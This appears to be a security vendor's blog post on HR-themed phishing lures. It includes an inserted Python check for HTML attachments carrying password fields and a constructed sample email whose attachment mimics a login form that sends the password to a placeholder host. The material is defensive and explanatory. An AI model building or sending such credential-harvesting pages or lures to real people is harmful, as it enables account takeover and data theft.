This month has seen an increase in phishing campaigns targeting professionals purporting to be messages from Human Resources advising them about salary increases, promotions, updates to policies and procedures, and other annual updates. The start of the year typically sees the HR department issue updates to employees, including notifications about changes to employee benefits, proposed pay rises, and annual updates to policies and procedures. It is therefore no surprise that cybercriminals are taking advantage of the increase in HR communications and have adopted lures related to these start-of-year messages. Several campaigns have been detected this month that have targeted employees and used HR-related lures.
The emails have realistic subject lines, appear to have been sent internally, and have lures that are likely to prompt a quick response. Messages about changes to employee benefits, pay rises, and promotions are likely to be opened by employees quickly without thinking, as are other notifications from the HR department such as updates to internal policies. Phishing simulation data shows that these types of emails have some of the highest click rates.
These emails include a combination of attachments and hyperlinks. One campaign claimed to include important information about a new benefits package and required employees to open an attached .shtml file. The email claimed employees needed to review and digitally sign the document to acknowledge receipt. In this case, opening the attached file would load a local copy of a phishing page, which generated a fake Microsoft 365 login prompt in the user’s browser. The user’s email address is populated as the username, and they are required to enter their password. The user is told that their password must be entered as they are accessing sensitive internal information.
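The attachment-based variant above (an HTML-type file such as .shtml that renders a password prompt locally, with the recipient's address pre-filled) can be screened for at the mail gateway or in the SOC. The following Python check is an added example, not code from the original post or from any vendor named on it; the sample message is constructed for illustration and the form's target host is a placeholder on the reserved `.invalid` domain.

```python
import email
import re
from email import policy
from email.utils import getaddresses

# Extensions a browser will render locally, including the .shtml variant seen above.
HTML_EXTENSIONS = (".html", ".htm", ".shtml", ".xhtml")
PASSWORD_FIELD = re.compile(r'<input[^>]*type\s*=\s*["\']?password', re.I)

# Constructed sample message (not a real campaign artifact): recipient pre-filled, .invalid host.
SAMPLE_EML = b"""\
From: "Human Resources" <hr@example.com>
To: alice@example.com
Subject: Updated Benefits Package - Action Required
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please review and digitally sign the attached benefits document.
--b1
Content-Type: application/octet-stream; name="Benefits_2024.shtml"
Content-Disposition: attachment; filename="Benefits_2024.shtml"

<html><form action="https://login-placeholder.invalid/c" method="post">
<input name="login" value="alice@example.com" readonly>
<input name="passwd" type="password"></form></html>
--b1--
"""


def suspicious_html_attachments(raw_eml: bytes) -> list[dict]:
    """Flag HTML-type attachments containing a password input; note any pre-filled recipient."""
    msg = email.message_from_bytes(raw_eml, policy=policy.default)
    headers = [str(h) for h in msg.get_all("To", []) + msg.get_all("Cc", [])]
    recipients = [addr.lower() for _, addr in getaddresses(headers) if addr]
    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if not (name.endswith(HTML_EXTENSIONS) or part.get_content_type() == "text/html"):
            continue
        body = (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
        if PASSWORD_FIELD.search(body):
            findings.append({
                "filename": name,
                "prefilled_recipient": [r for r in recipients if r in body.lower()],
            })
    return findings
```

A hit with a pre-filled recipient address is a strong signal that the attachment is a credential-harvesting page rather than a legitimate document and is worth quarantining for analyst review.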
These phishing emails may be sent from external email addresses that spoof the HR department, but they are often sent from internal email accounts compromised in previous phishing attacks, which adds to the realism of the campaign and makes it harder for email security solutions to detect the emails as malicious. It is common for these campaigns to include malicious hyperlinks rather than attachments, with the user directed to a phishing page that mimics the domain of the organization or of a well-known, unrelated company. In one campaign, a healthcare organization was impersonated in an email purporting to provide details of updated medical benefits for employees. Another campaign involved notifications about changes to the employee security awareness training program for the new year.
Phishing is one of the most common tactics used by cybercriminals to gain initial access to business networks. The campaigns are easy to conduct, require little effort from the attackers, and are often effective. Simply opening a malicious attachment and enabling the content to view the document is all that is needed to install malware, and if a user can be convinced to disclose their Microsoft credentials, the attacker gains access to all associated Microsoft applications, including email, OneDrive, Teams, and SharePoint. That gives them both the foothold they need to conduct a more extensive attack and access to a considerable amount of sensitive company data.
Cybercriminals mimic the types of emails that employees are likely to receive at different times of the year. As tax season gets into full swing over the next few weeks, it is likely that there will be an increase in phishing campaigns targeting tax professionals, as well as campaigns targeting individuals with tax-related lures such as notifications about tax returns, tax rebates, and unpaid tax.
Businesses need to take steps to block these attacks. Antivirus software and a spam filter were once effective and could block the vast majority of email-based attacks. Phishing is becoming increasingly sophisticated, however, and the speed at which new, previously unseen malware variants can be created and released means these defenses are no longer as effective as they used to be.
To block more phishing attempts, businesses need to adopt a defense-in-depth approach. In addition to antivirus/endpoint detection software and an advanced spam filter, they should consider adding a web filter to block access to the web-based component of phishing attacks and to block malware downloads from the Internet. Multi-factor authentication should be implemented for accounts, although phishing kits are now in use that can bypass MFA. While any form of MFA is better than none, phishing-resistant MFA based on FIDO standards provides a much greater level of protection and is the ideal option to implement.
While it is the responsibility of organizations to block malicious emails and prevent them from reaching employees, it is inevitable that some will be delivered. It is therefore important to also provide security awareness training that teaches employees how to identify and avoid phishing attempts. Security awareness training combined with phishing simulations, such as those provided by TitanHQ through the SafeTitan platform, is proven to reduce susceptibility to phishing attacks.